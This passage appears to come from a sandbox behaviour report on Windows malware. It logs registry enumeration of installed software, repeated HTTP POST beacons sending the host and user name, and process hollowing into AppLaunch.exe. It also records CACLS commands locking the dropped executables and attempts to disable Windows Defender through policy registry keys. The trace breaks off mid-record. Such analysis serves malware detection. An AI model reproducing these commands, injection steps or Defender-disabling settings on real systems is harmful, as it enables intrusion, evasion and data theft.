regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM UX MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Lync MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Acrobat Reader DC MUI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0
Process injection Process 2984 called NtSetContextThread to modify thread in remote process 3044
Process injection Process 2732 called NtSetContextThread to modify thread in remote process 2976
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 2005598660
registers.esp: 1834392
registers.edi: 0
registers.eax: 4306318
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000020
process_identifier: 3044
1 0 0

NtSetContextThread

 registers.eip: 2005598660
registers.esp: 2161196
registers.edi: 0
registers.eax: 4306298
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000027c
process_identifier: 2976
1 0 0
Time & API Arguments Status Return Repeated

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0
Process injection Process 2984 resumed a thread in remote process 3044
Process injection Process 2732 resumed a thread in remote process 2976
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000020
suspend_count: 1
process_identifier: 3044
1 0 0

NtResumeThread

 thread_handle: 0x0000027c
suspend_count: 1
process_identifier: 2976
1 0 0
cmdline cmd /k echo Y|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "test22:N"&&CACLS "..\4f9dd6f8a7" /P "test22:R" /E&&Exit
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "test22:N"&&CACLS "..\9e0894bcc4" /P "test22:R" /E&&Exit
cmdline CACLS "nbveek.exe" /P "test22:R" /E
cmdline CACLS "mnolyk.exe" /P "test22:N"
cmdline CACLS "..\4f9dd6f8a7" /P "test22:N"
cmdline CACLS "..\9e0894bcc4" /P "test22:N"
cmdline CACLS "..\9e0894bcc4" /P "test22:R" /E
cmdline CACLS "nbveek.exe" /P "test22:N"
cmdline CACLS "..\4f9dd6f8a7" /P "test22:R" /E
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "test22:N"&&CACLS "..\4f9dd6f8a7" /P "test22:R" /E&&Exit
cmdline CACLS "mnolyk.exe" /P "test22:R" /E
cmdline cmd /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "test22:N"&&CACLS "..\9e0894bcc4" /P "test22:R" /E&&Exit
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2052
thread_handle: 0x0000001c
process_identifier: 2032
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\sLP46se.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000128
1 1 0

CreateProcessInternalW

 thread_identifier: 2124
thread_handle: 0x00000128
process_identifier: 2120
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\rtJ58hE.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

 thread_identifier: 2096
thread_handle: 0x0000001c
process_identifier: 2092
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\slV42BL.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000128
1 1 0

CreateProcessInternalW

 thread_identifier: 2988
thread_handle: 0x00000128
process_identifier: 2984
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\nJM68XE.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

 thread_identifier: 2180
thread_handle: 0x0000001c
process_identifier: 2176
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP002.TMP\sCf07ZB.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000128
1 1 0

CreateProcessInternalW

 thread_identifier: 2732
thread_handle: 0x00000128
process_identifier: 2728
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP002.TMP\leW63TH.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

 thread_identifier: 2232
thread_handle: 0x0000001c
process_identifier: 2228
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP003.TMP\iWr34lU.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000128
1 1 0

CreateProcessInternalW

 thread_identifier: 2688
thread_handle: 0x00000128
process_identifier: 2684
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP003.TMP\kQu23BE.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

NtResumeThread

 thread_handle: 0x000000000000012c
suspend_count: 1
process_identifier: 2228
1 0 0

NtResumeThread

 thread_handle: 0x00000000000001a0
suspend_count: 1
process_identifier: 2228
1 0 0

NtResumeThread

 thread_handle: 0x00000000000001e4
suspend_count: 1
process_identifier: 2228
1 0 0

NtResumeThread

 thread_handle: 0x00000188
suspend_count: 1
process_identifier: 2728
1 0 0

NtResumeThread

 thread_handle: 0x000001fc
suspend_count: 1
process_identifier: 2728
1 0 0

NtResumeThread

 thread_handle: 0x00000244
suspend_count: 1
process_identifier: 2728
1 0 0

NtResumeThread

 thread_handle: 0x000002f8
suspend_count: 1
process_identifier: 2728
1 0 0

NtGetContextThread

 thread_handle: 0x0000018c
1 0 0

NtGetContextThread

 thread_handle: 0x0000018c
1 0 0

NtResumeThread

 thread_handle: 0x0000018c
suspend_count: 1
process_identifier: 2728
1 0 0

CreateProcessInternalW

 thread_identifier: 3048
thread_handle: 0x00000020
process_identifier: 3044
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000002c
1 1 0

NtGetContextThread

 thread_handle: 0x00000020
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3044
region_size: 204800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000002c
1 0 0

WriteProcessMemory

 buffer:
base_address: 0x00400000
process_identifier: 3044
process_handle: 0x0000002c
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 3044
process_handle: 0x0000002c
1 1 0

NtSetContextThread

 registers.eip: 2005598660
registers.esp: 1834392
registers.edi: 0
registers.eax: 4306318
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000020
process_identifier: 3044
1 0 0

NtResumeThread

 thread_handle: 0x00000020
suspend_count: 1
process_identifier: 3044
1 0 0

NtResumeThread

 thread_handle: 0x00000188
suspend_count: 1
process_identifier: 3044
1 0 0

NtResumeThread

 thread_handle: 0x000001fc
suspend_count: 1
process_identifier: 3044
1 0 0

NtResumeThread

 thread_handle: 0x00000228
suspend_count: 1
process_identifier: 3044
1 0 0

NtResumeThread

 thread_handle: 0x00000394
suspend_count: 1
process_identifier: 3044
1 0 0

NtGetContextThread

 thread_handle: 0x0000018c
1 0 0

NtGetContextThread

 thread_handle: 0x0000018c
1 0 0

NtResumeThread

 thread_handle: 0x0000018c
suspend_count: 1
process_identifier: 3044
1 0 0

CreateProcessInternalW

 thread_identifier: 2260
thread_handle: 0x000002b4
process_identifier: 2256
current_directory: C:\Users\test22\AppData\Local\Temp\IXP000.TMP
filepath: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002bc
1 1 0

NtResumeThread

 thread_handle: 0x0000027c
suspend_count: 1
process_identifier: 2256
1 0 0

CreateProcessInternalW

 thread_identifier: 1156
thread_handle: 0x000002a0
process_identifier: 296
